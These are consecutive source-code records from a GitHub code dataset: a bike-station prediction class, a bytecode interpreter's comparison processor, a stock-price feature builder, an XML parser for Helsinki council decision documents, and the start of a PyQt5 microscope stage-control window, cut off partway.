Run: Lasso\")\n\t\t\tself.clf = linear_model.Lasso()\n\t\tself.clf.fit(X, Y)\n\t\tself.clf.predict(self.test_data)\n\n\n\t\t#print(self.clf.coef_)\n\t\t#print(self.clf.score(self.test_data, self.test_labels))\n\t\treturn True\n\n\tdef regression_predict(self, case):\n\t\t#print(\"getting prediction\")\n\t\treturn self.clf.predict(case.reshape(1, -1))[0]\n\n\tdef GRBT_predict(self, case):\n\t\treturn self.est.predict(case.reshape(1, -1))\n\n\tdef has_data(self):\n\t\tif (type(self.test_data) == None or type(self.training_data) == None):\n\t\t\treturn False\n\t\tif (len(self.test_data) == 0):\n\t\t\treturn False\n\t\tif (len(self.training_data) < 2):\n\t\t\treturn False\n\t\treturn True\n\n\tdef GRBT_classifier(self):\n\t\tif self.has_data():\n\t\t\tpass\n\t\telse:\n\t\t\treturn False\n\t\tif check_if_distinct_values(self.training_labels):\n\t\t\tpass\n\t\telse:\n\t\t\treturn False\n\t\t# fit estimator\n\t\t#print('Length of training data:',len(self.training_data))\n\t\t#print('Length of training labels:',len(self.training_labels))\n\t\tself.est = GradientBoostingClassifier(n_estimators=200, max_depth=3) # depth 4-6\n\t\tself.est.fit(self.training_data, self.training_labels)\n\n\t\t# predict class labels\n\t\t#pred = self.est.predict(self.test_data)\n\n\t\t# score on test data (accuracy)\n\t\tacc = self.est.score(self.test_data, self.test_labels)\n\t\t#print('ACC: %.4f' % acc)\n\n\t\t# predict class probabilities\n\t\t#print(self.est.predict_proba(self.training_data)[0])\n\t\treturn True\n\n\tdef find_best_matching_case(self, case, station_status):\n\t\t# end_station must be same for all trip data\n\t\t\"\"\"if station_status != None:\n\t\t\tstations_that_have_capacity = []\n\t\t\tstations_that_have_capacity_labels = []\n\t\t\tfor i, data_point in enumerate(self.training_data):\n\t\t\t\tstation_number = self.training_labels[i]\n\t\t\t\tif (get_available_slots(station_status, station_number) > 0):\n\t\t\t\t\tstations_that_have_capacity.append(data_point)\n\t\t\t\t\tstations_that_have_capacity_labels.append(station_number)\n\t\t\t\t#original_tree = spatial.KDTree(self.training_data)\n\t\t\t\t#original_choice = original_tree.query(case)\n\t\t\t\t#tree = spatial.KDTree(stations_that_have_capacity)\n\t\t\t\t#best_case = tree.query(case)\n\t\t\t\t#if (best_case != original_choice):\n\t\t\t\t#\tprint(best_case, original_choice)\n\t\telse:\n\t\t\tprint('WARNING! 
station status is none')\n\t\t\tstations_that_have_capacity = self.training_data\n\t\t\tstations_that_have_capacity_labels = self.training_labels\n\t\tif (len(stations_that_have_capacity) < 2):\n\t\t\treturn -1, -1\"\"\"\n\t\tstations_that_have_capacity = self.training_data\n\t\tstations_that_have_capacity_labels = self.training_labels\n\n\t\ttree = spatial.KDTree(stations_that_have_capacity)\n\t\tbest_case = tree.query(case)\n\t\tdistance = best_case[0]\n\t\t#if (get_available_slots(station_status, best_case[1]) == 0):\n\t\t#\tprint(get_available_slots(station_status, best_case[1]), self.st[best_case[1]])\n\t\tif distance < self.closeness_cuttoff:# self.closeness_cuttoff:\n\t\t\treturn stations_that_have_capacity_labels[best_case[1]]\n\t\treturn [-1, -1]\n\n\tdef prediction_of_label_by_best_matching_case(self, case, station_status):\n\t\tbest_case_label = self.find_best_matching_case(case=case, station_status=station_status)\n\t\treturn best_case_label\n\n\tdef run_all_test_data(self):\n\t\thits_misses = [0, 0]\n\t\tfor i, case in enumerate(self.test_data):\n\t\t\t_, label_prediction= self.get_prediction(case=case)\n\t\t\tcorrect_label = self.test_labels[i]\n\t\t\t#print(label_prediction, correct_label)\n\t\t\tif label_prediction == correct_label:\n\t\t\t\thits_misses[0] += 1\n\t\t\telse:\n\t\t\t\thits_misses[1] += 1\n\t\tprint(\"Run all test_data for single user\")\n\t\tprint(hits_misses)\n\n\tdef get_prediction(self, case, station_status):\n\t\tif self.predictor_func == \"BestMatchingCase\":\n\t\t\treturn self.prediction_of_label_by_best_matching_case(\n\t\t\t\tcase=case, station_status=station_status)\n\t\telif self.predictor_func[:len('Regression')] == \"Regression\":\n\t\t\treturn self.regression_predict(case=case)\n\t\telif self.predictor_func == 'GRBT':\n\t\t\treturn self.GRBT_predict(case=case)\n\t\telse:\n\t\t\tprint(\"Didn't recognize predictor function: \"+self.predictor_func)\n\t\t\tprint(\"Using regression_prediction\")\n\t\t\treturn self.regression_predict(case=case)\n\n\tdef plot_data(self, x_plot, ground_truth_x_plot, figsize=(8, 5)):\n\t\tfig = plt.figure(figsize=figsize)\n\t\t#gt = plt.plot(x_plot, ground_truth(x_plot), alpha=0.4, label='ground truth')\n\n\t\t# plot training and testing data\n\t\tplt.scatter(self.training_data, self.training_labels, s=10, alpha=0.4)\n\t\tplt.scatter(self.test_data, self.test_labels, s=10, alpha=0.4, color='red')\n\t\tplt.xlim((0, 10))\n\t\tplt.ylabel('y')\n\t\tplt.xlabel('x')\n\ndef get_available_slots(station_status, station_number):\n\tif (station_number in station_status.keys()):\n\t\treturn station_status[station_number]\n\telse: return 0\n\n\ndef check_if_distinct_values(data):\n\tdata_0 = data[0]\n\tfor d in data:\n\t\tif d != data_0:\n\t\t\treturn True\n\treturn False\n\ndef ground_truth(data, labels):\n\treturn labels","repo_name":"jolohan/fordypningsprosjekt","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30976994568","text":"from src.bcint.state_machine.instruction_processors.instruction_processor_base import InstructionProcessorBase\nfrom src.bcint.state_machine.func_frame import FuncFrame\nfrom src.bcint.state_machine.func_state import FuncState\nfrom src.bcint.state_machine.heap import Heap\nfrom src.bcint.state_machine.binary_comparer import BinaryComparer\n\n\nclass CompareOpProcessor(InstructionProcessorBase):\n\n def __init__(self, binary_comparer: BinaryComparer = 
None):\n if not binary_comparer:\n binary_comparer = BinaryComparer()\n self._binary_comparer = binary_comparer\n\n def execute(self, operand, func_frame: FuncFrame, func_state: FuncState, heap: Heap):\n value2 = func_frame.eval_stack.pop()\n value1 = func_frame.eval_stack.pop()\n comp_res = self._binary_comparer.compare(operand, value1, value2)\n func_frame.eval_stack.push(comp_res)\n\n @property\n def binary_comparer(self):\n return self._binary_comparer\n","repo_name":"hanlarmammadov/bcint","sub_path":"src/bcint/state_machine/instruction_processors/compare_op_processor.py","file_name":"compare_op_processor.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28776335060","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport pandas as pd\nfrom price_db import retrieve_id_ticker\nfrom price_db import retrieve_daily_price\nfrom ind import *\n\n\n\"\"\"\nretrieve data from database and add some features\n\"\"\"\ndef make_dataset1(ticker, column_name, start_date, end_date):\n\n df_a = retrieve_daily_price(ticker, \n columns=('price_date', 'open_price','high_price','low_price', 'adj_close_price', 'volume'), \n start=start_date, end=end_date)\n ## df_a = retrieve_daily_price(ticker, columns=('price_date', 'Close'), start=start_date, end=end_date)\n ## moving_average(df_a, 15)\n df_a = momentum(df_a, 5, column_name)\n df_a = moving_average(df_a, 5, column_name)\n df_a = moving_average(df_a, 15, column_name)\n df_a = rate_of_change(df_a, 5, column_name)\n df_a = stochastic_oscillator_k(df_a, column_name)\n df_a = williams_r(df_a, 15, column_name)\n df_a = relative_strength_index(df_a, 15, column_name)\n df_a = price_volume_trend(df_a, 15, column_name)\n df_a.dropna(inplace=True)\n\n ##df_a = exponential_moving_average(df_a, 5, column_name)\n ##df_a = bollinger_bands(df_a, 5, column_name)\n ##print(df_a.shape[0], len(df_a.index))\n ##print(df_a.head())\n ##print(df_a.tail())\n return df_a\n\n\"\"\"\nbuild train/test data by 5 day lag, address change direction\n\"\"\"\ndef make_train_dir(df_a, column_name, prd, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0\n tsret[\"Direction\"] = np.sign(tsret[\"Today\"])\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\n\"\"\"\nbuild train/test data by 5 day lag, address change percentage\n\"\"\"\ndef make_train_pct(df_a, column_name, prd, pct, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0 - pct \n #tsret.to_csv(\"tsret2.csv\",float_format='%.3f')\n\n tsret[\"Direction\"] = 
np.sign(tsret[\"Today\"])\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\n\"\"\"\nbuild train/test data by 5 day lag, 0:no change 1:over 5% -1:under -5%\n\"\"\"\ndef make_train_3way(df_a, column_name, prd, pct, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0 \n\n tsret[\"Direction\"] = np.sign(tsret[\"Today\"])\n\n i = 0\n while i < (len(tsret.index)-1):\n tsret.loc[tsret.index[i], 'Direction'] = 0\n if i >= prd:\n if (tsret.loc[tsret.index[i], 'Today'] >= pct):\n tsret.loc[tsret.index[i-prd], 'Direction'] = 1.0\n elif (tsret.loc[tsret.index[i], 'Today'] <= -pct):\n tsret.loc[tsret.index[i-prd], 'Direction'] = -1.0\n i = i + 1\n #tsret.to_csv(\"tsret2.csv\",float_format='%.3f')\n\n\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\nif __name__ == \"__main__\":\n column_name = 'adj_close_price'\n date1 = datetime.datetime(2008, 4, 1)\n date2 = datetime.datetime(2017, 5, 1)\n ## train_date = datetime.datetime(2008, 4, 22) # one day ahead\n train_date = datetime.datetime(2008, 4, 29) # 5 day ahead\n test_date = datetime.datetime(2016,1,1)\n sym_df = retrieve_id_ticker()\n\n df_a = make_dataset1(sym_df[\"ticker\"][1], column_name, date1, date2)\n ## build the x_train and x_test\n ## X_train, X_test, y_train, y_test = make_train_dir(df_a, column_name, 5, train_date, test_date)\n ## X_train, X_test, y_train, y_test = make_train_pct(df_a, column_name, 5, 5.5, train_date, test_date)\n ##X_train, X_test, y_train, y_test = make_train_3way(df_a, column_name, 5, 5.5, train_date, test_date)\n \n ##X_train.to_csv(\"xtrain.csv\",float_format='%.3f')\n ##X_test.to_csv(\"xtest.csv\",float_format='%.3f')\n ##y_train.to_csv(\"ytrain.csv\",float_format='%.3f')\n ##y_test.to_csv(\"ytest.csv\",float_format='%.3f')\n\n","repo_name":"cujeu/quantocean","sub_path":"src/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31166860051","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport logging\nimport re\n\nimport pytz\nfrom lxml import etree\n\nfrom .document import Document\n\nRESOLUTION_MAP = {\n 'hyväksytty': 'accepted',\n 'arkistoitu': 'archived'\n}\n\nATTENDEE_MAP = {\n 'jäsenet': 'participant',\n 'ledamöter': 'participant',\n\n 'asiantuntija': 'expert',\n 'asiantuntijat': 'expert',\n\n 'muut': 'other',\n 'övriga': 'other'\n}\n\nLOCAL_TZ = pytz.timezone('Europe/Helsinki')\n\nLOG = logging.getLogger(__name__)\n\nGUID_REGEX = r'\\{([A-F0-9]{8}-(?:[A-F0-9]{4}-){3}[A-F0-9]{12})\\}'\n\ndef parse_xml(source, except_treshold=logging.CRITICAL):\n \"\"\"\n Parse given XML file to a document.\n\n :type source: file|str\n :param source: The XML file as a file object or a filename\n :type except_treshold: 
int\n :param except_treshold:\n Logging message threshold level. If a message with the given or\n any higher level is logged while parsing, then an exception is\n thrown.\n :raises ParseError: if there is an error in parsing\n :rtype: Document\n \"\"\"\n return XmlParser().parse(source, except_treshold)\n\n\ndef parse_guid(raw):\n \"\"\"\n Parse and validate GUIDs.\n\n :type raw: str\n :param raw:\n GUID in the format {123E4567-E89B-12D3-A456-426655440000}\n :rtype: str\n :return: GUID in the format 123e4567-e89b-12d3-a456-426655440000\n :raises ParseError: if the guid isn't in the specified format\n \"\"\"\n\n if raw is None:\n return None\n\n guid_match = re.fullmatch(GUID_REGEX, raw)\n if guid_match is not None:\n return guid_match.group(1).lower()\n else:\n raise ParseError(\"Invalid GUID format\")\n\n\nclass ParseError(Exception):\n pass\n\n\nDATE_RANGE_RX = re.compile(\n # Optional day prefix, e.g. 'Tiistai ' or ''\n r'(?:\\w+ )?'\n # Date, e.g. '29.8.2017' = GROUP 1\n r'(\\d{1,2}.\\d{1,2}.\\d{4})'\n # Optional clock word, e.g. 'kello ', 'klo ', 'klockan ', or ''\n r' (?:\\w+ )?'\n # Start time, e.g. '7:25' = GROUP 2\n r'(\\d{1,2}[:.]\\d\\d)'\n # Separator dash, e.g. ' - ' or '-'\n r' ?- ?'\n # End time, e.g. '9:40' = GROUP 3\n r'(\\d{1,2}[:.]\\d\\d)')\n\n\nclass XmlParser:\n @classmethod\n def clean_html(cls, raw):\n # TODO\n return ''.join([str(etree.tostring(el)) for el in raw])\n\n @classmethod\n def parse_funcid(cls, raw):\n \"\"\"\n Parse given function id to a sensible format.\n\n :type raw: str\n :param raw:\n The function id as it appears in Ahjo XMLs.\n Example: 00 00 03 Valtuuston aloitetoiminta\n :rtype: tuple(str, str)\n :return:\n A tuple with the number part and the text part.\n With the given example this would be ('00 00 03',\n 'Valtuuston aloitetoiminta')\n \"\"\"\n\n if raw is None:\n return (None, None)\n\n match = re.fullmatch(r'((?:\\d\\d ){0,}\\d\\d) (.*)', raw)\n return (match.group(1), match.group(2))\n\n @classmethod\n def parse_name(cls, name):\n \"\"\"\n Parse human names\n\n :type raw: str\n :param raw: Name in the format 'last, first'\n :rtype: str\n :return: Name in the format 'first last'\n \"\"\"\n\n if ', ' in name:\n name = name.split(', ')\n name = '{} {}'.format(name[1], name[0])\n\n return name\n\n @classmethod\n def parse_datetime(cls, raw):\n \"\"\"\n Parse timestamps appearing in the AHJO xml.\n\n :type raw: str\n :param raw: Timestamp in one of the specified formats\n :rtype: datetime\n :return: A localized datetime object\n :raises ParseError: if the date isn't in any of the specified formats\n \"\"\"\n\n if raw is None:\n return None\n\n date = None\n\n formats = [\n '%m/%d/%Y %I:%M:%S %p',\n '%m/%d/%Y %H:%M:%S',\n\n '%d.%m.%Y %I:%M:%S %p',\n '%d.%m.%Y %H:%M:%S',\n ]\n\n for fmt in formats:\n try:\n date = datetime.datetime.strptime(raw, fmt)\n break\n except ValueError as r:\n pass\n\n if date is None:\n raise ParseError('Unknown timestamp')\n\n return LOCAL_TZ.localize(date)\n\n @classmethod\n def parse_datetime_range(cls, raw):\n \"\"\"\n Parse datetime range string to a pair of datetimes.\n\n :type raw: str|None\n :rtype: (datetime.datetime, datetime.datetime)|None\n \"\"\"\n m = DATE_RANGE_RX.match(raw or '')\n if not m:\n return None\n date_str = m.group(1)\n start_str = date_str + ' ' + m.group(2).replace('.', ':')\n end_str = date_str + ' ' + m.group(3).replace('.', ':')\n try:\n start = datetime.datetime.strptime(start_str, '%d.%m.%Y %H:%M')\n end = datetime.datetime.strptime(end_str, '%d.%m.%Y %H:%M')\n except ValueError:\n return 
None\n return (start, end)\n\n @classmethod\n def gt(cls, parent, el_name, log=lambda x: None, fmt=lambda x: x):\n \"\"\"\n Get text of an element. If the element doesn't exist, we\n log something using the log parameter.\n\n :type parent: Element\n :param parent: Parent element where the element should be searched format\n\n :type el_name: str\n :param el_name: Name of the child element\n\n :type log: function\n :param log: Logger function to be called if the element isn't found\n\n :type fmt: function\n :param fmt: If present, will be called with the retrieved text\n\n :rtype: str or None\n :return: Text of an element if found. None otherwise.\n \"\"\"\n\n el = parent.find(el_name)\n if el is None:\n log(\"Element {} not found\".format(el_name))\n return None\n else:\n content = el.text\n if content is None:\n log(\"Element {} is empty\".format(el_name))\n return content\n\n return fmt(content)\n\n def import_attendees(self, ctx, lasnaolotiedot):\n \"\"\"\n Parse attendees of an event.\n\n Simplified example structure::\n \n \n Jäsenet\n \n Lastname, Firstname\n some title\n \n puheenjohtaja\n \n \n \n\n Returned list::\n [\n {\n 'name': 'Firstname Lastname',\n 'role': 'puheenjohtaja',\n 'title': 'some title',\n 'category': 'participant'\n }\n ]\n \"\"\"\n\n ret = []\n\n attendee_group_els = lasnaolotiedot.findall('.//Osallistujaryhma')\n\n for attendee_group_el in attendee_group_els:\n group_name = self.gt(attendee_group_el, 'OsallistujaryhmaOtsikko', ctx.error)\n attendees = attendee_group_el.findall('Osallistujat')\n\n for attendee in attendees:\n a_attrs = {}\n\n name = attendee.find('Nimi')\n if name is not None and name.text:\n a_attrs['name'] = self.parse_name(name.text)\n else:\n ctx.warning(\"Attendee doesn't have a name\")\n continue\n\n opts = attendee.find('OsallistujaOptiot')\n if opts is not None:\n _set_if_non_empty(a_attrs, 'role', self.gt(opts, 'Rooli'))\n\n _set_if_non_empty(a_attrs, 'title', self.gt(attendee, 'Titteli'))\n\n category = ATTENDEE_MAP.get((group_name or '').lower())\n a_attrs['category'] = (category or 'participant')\n\n ret.append(a_attrs)\n\n return ret\n\n def import_event(self, ctx, data1, data2):\n \"\"\"\n Parse an event's metadata from the document.\n\n A single document only contains one event, so this function\n only exists to split the code around a little.\n \"\"\"\n\n attrs = {}\n\n if data1 is not None:\n lasnaolotiedot = data1.find('Lasnaolotiedot')\n attrs['attendees'] = self.import_attendees(ctx, lasnaolotiedot)\n\n kokoustiedot = data1.find('Kokoustiedot')\n location = self.gt(kokoustiedot, 'Kokouspaikka')\n if location:\n attrs['location'] = location\n\n # format: dd.mm.yyyy hh:mm - hh:mm, possible extra stuff\n\n # This should be probably improved at some point but it's hard to Convert\n # all cases because it's not standard in any way. Sometimes there are breaks\n # or the event has been held in multiple sessions at different times. 
# How would this even be represented in the database?\n datetime_str = self.gt(kokoustiedot, 'Kokousaika')\n date_range = self.parse_datetime_range(datetime_str)\n if date_range:\n attrs['start_date'] = LOCAL_TZ.localize(date_range[0])\n attrs['end_date'] = LOCAL_TZ.localize(date_range[1])\n\n if data2 is not None:\n attrs['name'] = '{} {}'.format(self.gt(data2, 'Paattaja'), self.gt(data2, 'Asiakirjatunnus'))\n else:\n attrs['name'] = ''\n\n if not attrs.get('start_date') and data2 is not None:\n date_str = self.gt(data2, 'Paivays')\n if date_str:\n date = datetime.datetime.strptime(date_str, '%Y-%m-%d')\n attrs['start_date'] = LOCAL_TZ.localize(date)\n attrs['end_date'] = LOCAL_TZ.localize(date)\n\n if not attrs.get('start_date') or not attrs.get('end_date'):\n raise ParseError('No date information found')\n\n return attrs\n\n def import_content(self, ctx, content):\n \"\"\"\n Parse the content section of a single action.\n \"\"\"\n\n if content is None:\n return None\n\n s = \"\"\n\n # NOTE: the markup tags in this method were lost in extraction and have\n # been reconstructed; h2/p/h3 are assumptions.\n for section in content:\n heading = self.gt(section, 'SisaltoOtsikko')\n if heading is not None:\n
s += '<h2>{}</h2>\\n'.format(heading)\n\n mystery = section.find('TekstiSektio/taso1')\n if mystery is not None:\n for el in mystery:\n if el.tag == 'Kappale':\n s += '<p>{}</p>\\n'.format(self.gt(el, 'KappaleTeksti'))\n elif el.tag == 'Otsikko':\n s += '<h3>{}</h3>\\n'.format(el.text)\n elif el.tag == 'XHTML':\n s += self.clean_html(el)\n\n return s\n\n def import_action(self, ctx, action):\n \"\"\"\n Parse a single action.\n \"\"\"\n\n attrs = {}\n\n metadata = action.find('KuvailutiedotOpenDocument')\n\n vakiopaatos = False\n asktieto = self.gt(metadata, 'AsiakirjallinenTieto')\n if asktieto is not None and 'vakiopäätös' in asktieto:\n vakiopaatos = True\n\n attrs['title'] = self.gt(metadata, 'Otsikko', ctx.warning)\n ctx.current_action = attrs['title']\n\n (function_id, function_name) = self.parse_funcid(\n self.gt(metadata, 'Tehtavaluokka', ctx.warning))\n _set_if_non_empty(attrs, 'function_id', function_id)\n _set_if_non_empty(attrs, 'function_name', function_name)\n\n case_guid = parse_guid(self.gt(metadata, 'AsiaGuid'))\n if case_guid is None and not vakiopaatos:\n ctx.error(\"Action doesn't have an associated case\")\n _set_if_non_empty(attrs, 'case_guid', case_guid)\n\n _set_if_non_empty(\n attrs, 'date',\n self.parse_datetime(self.gt(metadata, 'Paatospaiva', ctx.error)))\n article_number = self.gt(metadata, 'Pykala', ctx.error, fmt=int)\n if article_number is not None:\n attrs['article_number'] = article_number\n\n register_id = self.gt(metadata, 'Dnro/DnroLyhyt')\n if register_id is None and not vakiopaatos:\n ctx.error(\"Action doesn't have a register id (diaarinumero)\")\n _set_if_non_empty(attrs, 'register_id', register_id)\n\n resolution_el = metadata.find('Asiakirjantila')\n\n if resolution_el is not None:\n try:\n attrs['resolution'] = RESOLUTION_MAP[resolution_el.text.lower()]\n except KeyError:\n ctx.warning(\"Unknown resolution type: {}\".format(resolution_el.text))\n else:\n ctx.warning(\"Action doesn't have a resolution\")\n\n content = action.find('SisaltoSektioToisto')\n attrs['content'] = self.import_content(ctx, content)\n\n keywords = action.findall('Asiasana')\n attrs['keywords'] = [{'name': kw.text} for kw in keywords]\n\n attrs['attachments'] = []\n attachments = action.findall('LiitteetOptio/Liitteet/LiitteetToisto')\n for a in attachments:\n name = self.gt(a, 'Liiteteksti')\n public = name != 'Salassa pidettävä' and self.gt(a, 'JulkaisuKytkin') == 'true'\n confidentiality_reason = self.gt(a, 'SalassapitoOptio/SalassapidonPerustelut')\n if not confidentiality_reason:\n confidentiality_reason = ''\n attrs['attachments'].append({\n 'id': parse_guid(self.gt(a, 'LiitteetId')),\n 'name': name,\n 'ordering': self.gt(a, 'Liitenumero', fmt=int),\n 'public': public,\n 'confidentiality_reason': confidentiality_reason\n })\n\n return attrs\n\n def import_document(self, ctx, root):\n \"\"\"\n Parse a single 'pöytäkirja' or 'viranhaltijan päätös'.\n \"\"\"\n\n attrs = {}\n\n event_metadata = root.find('PkKansilehtiSektio/KansilehtiToisto')\n event_metadata2 = root.find('YlatunnisteSektio')\n\n actions = root.find('Paatokset')\n\n attrs['type'] = 'minutes'\n attrs['event'] = self.import_event(ctx, event_metadata, event_metadata2)\n attrs['event']['actions'] = [self.import_action(ctx, ac) for ac in actions]\n\n # If this is a viranhaltijan päätös, we will add the\n # viranhaltija as the only person to the attendees.\n signatures = root.find('SahkoinenAllekirjoitusSektio')\n if signatures is None:\n signatures = root.find('AllekirjoitusSektio')\n chairman = signatures.find('PuheenjohtajaSektio').find('PuheenjohtajaToisto')\n name = chairman.find('Puheenjohtajanimi').text\n\n if name not in [a['name'] for a in attrs['event']['attendees']]:\n attrs['event']['attendees'].append({\n 'name': name,\n 'role': 'viranhaltija',\n })\n\n
return attrs\n\n def import_esityslista(self, ctx, root):\n raise NotImplementedError(\"Parsing of agendas is not implemented\")\n\n def parse(self, source, except_treshold=logging.CRITICAL):\n \"\"\"\n Initiate parsing of a single document.\n \"\"\"\n\n filename = source if isinstance(source, str) else source.name\n ctx = ParseContext(filename, except_treshold)\n\n xml = etree.parse(source)\n root = xml.getroot()\n\n if root.tag == 'Poytakirja':\n data = self.import_document(ctx, root)\n elif root.tag == 'Esityslista':\n data = self.import_esityslista(ctx, root)\n else:\n raise ValueError(\"Unknown root tag: {!r}\".format(root.tag))\n\n return Document(data, ctx.errors)\n\n\ndef _set_if_non_empty(mapping, key, value):\n if value:\n mapping[key] = value\n\n\nclass ParseContext:\n \"\"\"\n Helper class for easing the tracking of errors.\n \"\"\"\n\n def __init__(self, filename, except_treshold=logging.CRITICAL):\n self.filename = filename\n self.errors = []\n self.except_treshold = except_treshold\n self.current_action = None\n\n def log(self, severity, msg):\n human_readable = '{} (File: {}, Action: {})'.format(msg, self.filename, self.current_action)\n LOG.log(severity, human_readable)\n\n attrs = ['current_action']\n\n state = {attr: getattr(self, attr) for attr in attrs}\n state['filename'] = self.filename\n\n self.errors.append({\n 'msg': msg,\n 'severity': severity,\n 'state': state\n })\n\n if severity >= self.except_treshold:\n raise ParseError(msg)\n\n def critical(self, msg):\n self.log(logging.CRITICAL, msg)\n\n def error(self, msg):\n self.log(logging.ERROR, msg)\n\n def warning(self, msg):\n self.log(logging.WARNING, msg)\n\n def info(self, msg):\n self.log(logging.INFO, msg)\n\n def debug(self, msg):\n self.log(logging.DEBUG, msg)\n","repo_name":"City-of-Helsinki/paatos","sub_path":"decisions/importer/helsinki/ahjo/xmlparser.py","file_name":"xmlparser.py","file_ext":"py","file_size_in_byte":16846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33626028400","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport sys\r\nimport os\r\n\r\nclass stageUI(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n# self.setupUI()\r\n# self.show()\r\n self.path=os.path.dirname(__file__)\r\n\r\n def setupUI(self):\r\n self.setWindowTitle('stage')\r\n self.setGeometry(400, 400, 500, 500)\r\n self.setMinimumSize(QtCore.QSize(100, 100))\r\n self.setMaximumSize(QtCore.QSize(10000, 10000))\r\n self.gridLayout = QtWidgets.QGridLayout(self)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n\r\n\r\n\r\n spacerItem = QtWidgets.QSpacerItem(1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n spacerItem1=QtWidgets.QSpacerItem(100, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n# z movebutton\r\n self.zGroupBox = QtWidgets.QGroupBox(\"z axis control\",self)\r\n self.zGroupBox.setMinimumSize(QtCore.QSize(100, 120))\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.zGroupBox)\r\n self.verticalLayout.setSpacing(0)\r\n\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.zGroupBox)\r\n self.zupButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zupButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1uparrow-128.png\"))\r\n self.zupButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout.addWidget(self.zupButton)\r\n self.horizontalLayout.addItem(spacerItem)\r\n\r\n self.zupLButton = 
QtWidgets.QPushButton(self.zGroupBox)\r\n self.zupLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2uparrow-128.png\"))\r\n self.zupLButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout.addWidget(self.zupLButton)\r\n self.horizontalLayout.addItem(spacerItem)\r\n self.verticalLayout.addLayout(self.horizontalLayout)\r\n\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.zGroupBox)\r\n self.zdownButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zdownButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1downarrow1-128.png\"))\r\n self.zdownButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_2.addWidget(self.zdownButton)\r\n self.horizontalLayout_2.addItem(spacerItem)\r\n\r\n self.zdownLButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zdownLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2dowarrow-128.png\"))\r\n self.zdownLButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_2.addWidget(self.zdownLButton)\r\n self.horizontalLayout_2.addItem(spacerItem)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n\r\n self.verticalLayout.addItem(spacerItem)\r\n self.gridLayout.addWidget(self.zGroupBox, 0, 0, 1, 1)\r\n\r\n # gridlayout--verticallayout_5--upbuttons\r\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self)\r\n self.upLButton = QtWidgets.QPushButton(self)\r\n self.upLButton.setIcon(QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2uparrow-128.png\"))\r\n 